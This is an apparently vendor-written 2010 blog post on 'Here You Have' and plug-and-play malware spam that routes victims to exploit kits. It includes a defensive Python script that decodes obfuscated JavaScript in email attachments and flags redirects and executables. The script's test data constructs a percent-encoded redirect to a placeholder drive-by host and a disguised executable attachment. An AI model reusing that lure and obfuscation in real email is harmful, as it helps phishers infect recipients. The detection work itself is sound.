Sep 20

“Here You Have…” Virus Does Not Compare to Plug-and-Play Malware Threat

Earlier this month, the world was abuzz with the “Here You Have…” virus, which hit a number of big companies, including ABC/Disney, Google, Coca-Cola and NASA. In fact, on September 9, 2010, the day the virus was first detected, it ranked as the number two search on Google. The emails in the campaign contained a link, presented as a PDF file, that encouraged users to click. The file was actually a Windows script that infected the computer and then spammed the contact list of the person who opened it. According to a WSJ.com article, “The virus took down email servers at U.S. space agency NASA and companies such as cable giant Comcast Corp.”

While the spam campaign was annoying, it proved to be a low-level threat that simply got a lot of air time. Most experts were even surprised that old-school social engineering tactics continue to trick security systems and users, and that the virus was not seeking banking or financial information like most of today’s campaigns, including the ongoing plug-and-play (PNP) malware campaigns we have monitored since the beginning of the year. PNP malware represents a significant threat to users because of its level of sophistication and its constantly evolving techniques for convincing email recipients to click a link or download an attachment.

Over the past few months, PNP scammers have used three tactics in their emails to infect computer systems:

  1. A direct link to the drive-by host (commonly seen in the brand spoofs)
  2. An attached .html file containing obfuscated JavaScript that directs the browser to the drive-by host (common with the “personal emails” and spoofs)
  3. An executable attached directly to the message (a somewhat rarer form)

Tactics one and two are equally dangerous and require just one user action to initiate the attack: opening the (often presumed safe) HTML attachment, or clicking the call-to-action link, is enough to start the chain reaction. The attached executables take a couple more clicks, but apparently enough people still fall for this to make the technique worthwhile.

I described these variants a few weeks ago here: http://www.redcondor.com/blog/?p=356

The first two I would classify as PNP. The third type has essentially the same structure but does not involve the browser; it still appears to be generated by the same group of scammers responsible for the PNP campaigns.

The core of the PNP technique is to get the user’s browser to interact with the drive-by host, which brings the victim into contact with an exploit kit. The second component is a redirect to some secondary page after the exploit kit has had its chance to infect the user.
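As an added example (not code from the original post or from Red Condor), the following Python script triages the two attachment-borne tactics in the list above, 2 and 3, and the drive-by redirect this paragraph describes: it statically unwraps the unescape()-style obfuscation seen in the HTML attachments, extracts the redirect target, and flags outright executables. The sample message, the file names and the host driveby.example.invalid are constructed for the example and are not taken from any real campaign.

```python
"""Static triage of PNP-style email attachments.

Added example for this post, not Red Condor's code. It parses a constructed
sample message (built below) and flags the two attachment tactics the post
describes: an .html attachment whose obfuscated JavaScript redirects the
browser to a drive-by host, and an executable attached outright. Every host
name and file name here is a placeholder.
"""
import re
from email import message_from_bytes, policy
from email.message import EmailMessage
from urllib.parse import unquote

# Strings a redirect page needs in order to do its job (matched case-insensitively).
JS_INDICATORS = ("unescape(", "eval(", "document.write(", "string.fromcharcode",
                 "window.location", "location.href", "location.replace(")
HTML_INDICATORS = ('http-equiv="refresh"', "<iframe")
REDIRECT_MARKERS = ("window.location", "location.href", "location.replace(",
                    'http-equiv="refresh"', "<iframe")
EXEC_EXTENSIONS = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.I | re.S)


def js_unescape(s: str) -> str:
    """Model JavaScript's unescape(): %uXXXX is a UTF-16 unit, %XX one byte."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")  # latin-1: %XX -> that code point, as in JS


def decode_unescape_layers(script: str, max_layers: int = 5) -> str:
    """Replace every unescape('%..') call with its decoded argument, repeatedly,
    so nested encodings unwrap. Bounded so hostile input cannot spin forever."""
    text = script
    for _ in range(max_layers):
        new = UNESCAPE_RE.sub(lambda m: js_unescape(m.group(2)), text)
        if new == text:
            break
        text = new
    return text


def analyse_html(html: str) -> dict:
    """Score an HTML attachment: which indicators appear, whether the JavaScript
    was obfuscated, whether the decoded page redirects, and to where."""
    decoded = decode_unescape_layers(html)
    raw_l, dec_l = html.lower(), decoded.lower()
    hits = [i for i in JS_INDICATORS + HTML_INDICATORS if i in raw_l or i in dec_l]
    return {
        "obfuscated": decoded != html,
        "redirect": any(m in dec_l for m in REDIRECT_MARKERS),
        "indicators": hits,
        "urls": sorted(set(URL_RE.findall(decoded))),
    }


def triage_message(raw: bytes) -> list:
    """Walk a raw RFC 5322 message and return one finding per attachment."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        data = part.get_payload(decode=True) or b""
        if name.endswith(EXEC_EXTENSIONS) or data[:2] == b"MZ":
            # Tactic 3: executable attached outright (by extension or PE magic).
            findings.append({"name": name, "kind": "executable", "verdict": "block"})
        elif part.get_content_type() == "text/html" or name.endswith((".htm", ".html")):
            # Tactic 2: HTML attachment. Block only on obfuscation plus a redirect,
            # since plain HTML attachments are common in legitimate mail.
            info = analyse_html(data.decode("utf-8", "replace"))
            if info["obfuscated"] and info["redirect"]:
                verdict = "block"
            elif info["indicators"]:
                verdict = "review"
            else:
                verdict = "allow"
            findings.append({"name": name, "kind": "html", "verdict": verdict, **info})
    return findings


def build_sample() -> bytes:
    """Constructed 'personal email' in the style the post describes. The redirect
    target driveby.example.invalid is a placeholder, not a real drive-by host."""
    redirect_js = '<script>window.location="http://driveby.example.invalid/in.cgi?3"</script>'
    encoded = "".join("%%%02X" % b for b in redirect_js.encode())  # %3C%73%63...
    html = ("<html><body>Loading your photos...<script>var p=unescape(\""
            + encoded + "\");document.write(p);</script></body></html>")
    msg = EmailMessage()
    msg["From"] = "friend@example.com"
    msg["To"] = "victim@example.com"
    msg["Subject"] = "check out my photos"
    msg.set_content("The photos are in the attached page.")
    msg.add_attachment(html.encode(), maintype="text", subtype="html",
                       filename="photos.html")
    msg.add_attachment(b"MZ\x90\x00" + b"\x00" * 60, maintype="application",
                       subtype="octet-stream", filename="invoice.pdf.exe")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in triage_message(build_sample()):
        print(finding)
```

Running it prints one finding per attachment: the HTML page is blocked because its decoded JavaScript both was percent-encoded and sets window.location to the drive-by host, and the double-extension executable is blocked on its name and PE magic. The decoder only models unescape(); kits also use String.fromCharCode, split/join and eval chains, which this static pass surfaces only as indicators for review, so it complements rather than replaces URL reputation checks on the extracted host.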

Earlier in the year, this drop site tended to be a Canadian Pharmacy or Replica Rolex site (very common spam websites). What we are seeing more frequently now is a drop site that is itself a social engineering hack to get the user to voluntarily download malicious software. Examples of the latter are fake software “updates” and the current trend of fake anti-virus sites. The two types of drop sites are associated with CPA (cost per action) and PPI (pay per install) respectively. In other words, there are at least two chances to monetize each user’s fulfillment of the single ill-fated call to action.

This combination of exploit kit plus redirect is the essence of the PNP attack strategy. The reason it is so striking, and far more dangerous to users, is that any spam campaign with a browser-involved call to action (i.e. almost all spam) can easily be augmented with the PNP approach. This means that a campaign that would have been sent anyway can carry a secondary component that brings the user’s browser into contact with an exploit kit before landing on the “normal” spam page. There are numerous benefits to the spammer in doing this.

While the technique seems limited to a small subset of spammers, the scammers may not even realize the potential of this approach. It could also be that only the top-tier spammers have access to the platform, and that we will see greater uptake of the technique once the software percolates down to the lower tiers. We are finally starting to see respectable volume from these campaigns as of this past week. See our release on the recent rise.

One way or another, this technique has roots extending back about a year now, so I think it is safe to say that it is a relatively permanent feature of spam going forward, as I speculated earlier in the year. The one thing that could change that is if browsers get very good at detecting and blocking the technique. Google’s Safe Browsing, for example, has made great strides in this realm since the beginning of the year.

Unfortunately, while the world was distracted by the relatively tame “Here You Have…” virus, the PNP scammers continued to change their techniques, improve their ability to get messages to more unsuspecting email users, and evolve to bypass security systems.